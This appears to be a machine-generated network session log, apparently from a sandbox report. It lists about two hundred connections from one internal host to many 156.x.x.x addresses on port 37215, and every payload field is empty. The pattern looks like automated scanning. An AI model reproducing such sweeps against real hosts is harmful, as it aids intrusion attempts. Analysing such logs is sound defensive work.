                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11928192.168.2.1533100156.141.135.13737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11929192.168.2.1536816156.102.177.22637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11930192.168.2.1533176156.227.195.18537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11931192.168.2.1532818156.104.13.15637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11932192.168.2.1543198156.36.137.13437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11933192.168.2.1547102156.157.246.21537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11934192.168.2.1548862156.254.131.12937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11935192.168.2.1552150156.70.84.14337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11936192.168.2.1538830156.113.165.21537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11937192.168.2.1547186156.143.152.3437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11938192.168.2.1543740156.205.247.14237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11939192.168.2.1541374156.212.203.24637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11940192.168.2.1532982156.56.121.22737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11941192.168.2.1559588156.223.190.5337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11942192.168.2.1535496156.3.125.15137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11943192.168.2.1544378156.51.11.23437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11944192.168.2.1554276156.0.151.13337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11945192.168.2.1549492156.240.3.1837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11946192.168.2.1536732156.1.44.10837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11947192.168.2.1558458156.111.101.3837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11948192.168.2.1538876156.112.243.24037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11949192.168.2.1542174156.4.167.16237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11950192.168.2.1539748156.221.8.9737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11951192.168.2.1539182156.7.169.25437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11952192.168.2.1545190156.164.26.7537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11953192.168.2.1559496156.149.119.5837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11954192.168.2.1554170156.233.191.10437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11955192.168.2.1538352156.212.243.12437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11956192.168.2.1557644156.167.174.3337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11957192.168.2.1538694156.33.184.10537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11958192.168.2.1543964156.226.219.4037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11959192.168.2.1540230156.211.119.9637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11960192.168.2.1552464156.213.236.6737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11961192.168.2.1558414156.87.223.15637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11962192.168.2.1533244156.5.164.6737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11963192.168.2.1543630156.183.166.4537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11964192.168.2.1537430156.106.247.2137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11965192.168.2.1556000156.136.80.12737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11966192.168.2.1548324156.157.23.4837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11967192.168.2.1555708156.242.19.4737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11968192.168.2.1560436156.194.76.18837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11969192.168.2.1540408156.101.84.24937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11970192.168.2.1555002156.37.134.12737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11971192.168.2.1538744156.45.131.23137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11972192.168.2.1540142156.251.103.5637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11973192.168.2.1538638156.207.24.337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11974192.168.2.1540804156.32.253.12137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11975192.168.2.1549948156.21.209.9437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11976192.168.2.1560672156.92.218.7637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11977192.168.2.1535828156.131.231.14837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11978192.168.2.1538292156.122.69.6137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11979192.168.2.1534306156.82.28.4837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11980192.168.2.1533430156.78.238.2437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11981192.168.2.1558576156.237.165.13137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11982192.168.2.1560482156.38.109.4037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11983192.168.2.1547140156.98.176.1337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11984192.168.2.1542948156.106.2.2637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11985192.168.2.1538166156.179.104.7537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11986192.168.2.1552520156.248.90.5837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11987192.168.2.1541754156.0.1.3337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11988192.168.2.1544648156.185.43.17837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11989192.168.2.1545482156.4.0.9137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11990192.168.2.1551422156.33.53.4537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11991192.168.2.1533232156.110.245.6037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11992192.168.2.1560142156.252.38.25037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11993192.168.2.1554042156.233.92.10637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11994192.168.2.1542108156.151.115.24937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11995192.168.2.1549140156.122.107.4137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11996192.168.2.1536102156.74.0.15637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11997192.168.2.1554642156.210.91.20337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11998192.168.2.1550062156.58.190.1837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            11999192.168.2.1536134156.126.170.4137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12000192.168.2.1553182156.228.19.23937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12001192.168.2.1555428156.161.184.4037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12002192.168.2.1554248156.14.193.19337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12003192.168.2.1555208156.204.187.5137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12004192.168.2.1553076156.104.148.9837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12005192.168.2.1539804156.72.142.20937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12006192.168.2.1556110156.204.160.24537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12007192.168.2.1550008156.255.112.9237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12008192.168.2.1553878156.158.231.6537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12009192.168.2.1553572156.233.200.15437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12010192.168.2.1537906156.166.196.24137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12011192.168.2.1558846156.165.176.25337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12012192.168.2.1540404156.195.145.12737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12013192.168.2.1557068156.216.112.17037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12014192.168.2.1540392156.107.33.9437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12015192.168.2.1559204156.41.67.16937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12016192.168.2.1555598156.250.224.11037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12017192.168.2.1542868156.61.239.12837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12018192.168.2.1546606156.59.63.12137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12019192.168.2.1533184156.230.143.25137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12020192.168.2.1540136156.114.42.237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12021192.168.2.1536200156.176.27.17437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12022192.168.2.1534318156.177.220.23737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12023192.168.2.1538522156.11.220.15837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12024192.168.2.1545056156.226.38.9537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12025192.168.2.1543116156.18.223.25137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12026192.168.2.1537206156.8.228.4237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12027192.168.2.1550148156.64.100.12137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12028192.168.2.1541490156.201.218.637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12029192.168.2.1539980156.224.158.2037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12030192.168.2.1542516156.232.195.6737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12031192.168.2.1544054156.93.239.18537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12032192.168.2.1532872156.167.230.21037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12033192.168.2.1544014156.37.207.10337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12034192.168.2.1558254156.23.53.22137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12035192.168.2.1542250156.100.172.22737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12036192.168.2.1560366156.194.144.537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12037192.168.2.1546588156.237.94.19237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12038192.168.2.1560290156.76.204.21137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12039192.168.2.1548098156.203.77.15837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12040192.168.2.1560574156.106.56.20737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12041192.168.2.1545982156.115.82.17137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12042192.168.2.1554898156.125.3.3237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12043192.168.2.1550946156.207.255.2637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12044192.168.2.1541928156.74.98.22637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12045192.168.2.1533284156.38.145.19737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12046192.168.2.1536778156.130.127.2437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12047192.168.2.1553094156.122.135.20537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12048192.168.2.1538736156.107.84.8137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12049192.168.2.1549278156.252.41.21937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12050192.168.2.1541876156.163.241.15337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12051192.168.2.1560542156.118.122.25137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12052192.168.2.1559068156.24.205.5237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12053192.168.2.1544502156.142.142.2937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12054192.168.2.1542432156.110.184.24937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12055192.168.2.1541124156.114.193.10137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12056192.168.2.1554574156.168.196.25037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12057192.168.2.1547240156.62.171.4237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12058192.168.2.1551944156.87.123.6837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12059192.168.2.1542952156.102.154.21037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12060192.168.2.1558636156.108.90.15237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12061192.168.2.1557852156.246.78.25137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12062192.168.2.1547568156.130.92.23037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12063192.168.2.1540656156.61.91.22737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12064192.168.2.1533866156.62.46.15837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12065192.168.2.1553480156.250.255.19237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12066192.168.2.1550354156.224.131.7037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12067192.168.2.1550364156.87.28.21537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12068192.168.2.1540270156.169.99.12837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12069192.168.2.1545028156.47.155.18937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12070192.168.2.1559830156.79.98.237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12071192.168.2.1547562156.161.157.2937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12072192.168.2.1548930156.220.247.3737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12073192.168.2.1552600156.234.88.8637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12074192.168.2.1559634156.131.101.2237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12075192.168.2.1544680156.36.188.1837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12076192.168.2.1541730156.41.157.8137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12077192.168.2.1555552156.94.173.13837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12078192.168.2.1538728156.216.79.21737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12079192.168.2.1549668156.110.194.637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12080192.168.2.1550946156.27.57.9937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12081192.168.2.1543018156.51.186.18437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12082192.168.2.1553254156.255.160.21037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12083192.168.2.1557270156.140.125.2137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12084192.168.2.1533298156.174.66.3237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12085192.168.2.1541786156.22.63.2737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12086192.168.2.1559658156.163.162.22937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12087192.168.2.1553780156.225.33.23137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12088192.168.2.1537968156.234.100.22937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12089192.168.2.1540754156.105.200.14637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12090192.168.2.1537288156.210.68.21337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12091192.168.2.1533826156.167.6.4737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12092192.168.2.1555610156.68.240.23237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12093192.168.2.1559180156.82.63.1437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12094192.168.2.1557474156.19.138.23437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12095192.168.2.1538616156.160.234.19637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12096192.168.2.1557154156.236.41.23337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12097192.168.2.1543096156.55.102.7037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12098192.168.2.1538968156.103.181.1337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12099192.168.2.1533462156.35.142.24637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12100192.168.2.1543622156.99.115.18337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12101192.168.2.1532846156.165.138.12237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12102192.168.2.1537144156.158.161.10337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12103192.168.2.1536044156.36.252.14537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12104192.168.2.1546304156.90.68.10537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12105192.168.2.1532826156.82.120.11837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12106192.168.2.1541082156.208.86.11637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12107192.168.2.1557720156.218.93.6237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12108192.168.2.1560038156.13.4.11937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12109192.168.2.1545532156.90.8.4337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12110192.168.2.1547812156.155.194.20937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12111192.168.2.1546988156.142.128.13337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12112192.168.2.1535410156.166.59.21137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12113192.168.2.1553304156.23.6.25237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12114192.168.2.1559086156.219.197.1837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12115192.168.2.1549254156.158.154.9537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12116192.168.2.1541540156.7.104.9337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12117192.168.2.1548580156.18.114.7237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12118192.168.2.1556788156.162.194.15637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12119192.168.2.1559350156.249.11.8837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12120192.168.2.1532878156.80.168.23837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12121192.168.2.1536208156.132.125.18837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12122192.168.2.1544568156.248.54.12837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12123192.168.2.1534984156.7.174.2337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12124192.168.2.1548122156.231.160.4237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12125192.168.2.1548768156.249.9.5237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12126192.168.2.1535416156.14.140.2637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12127192.168.2.1533398156.127.77.22737215
                                                                            TimestampBytes transferredDirectionData


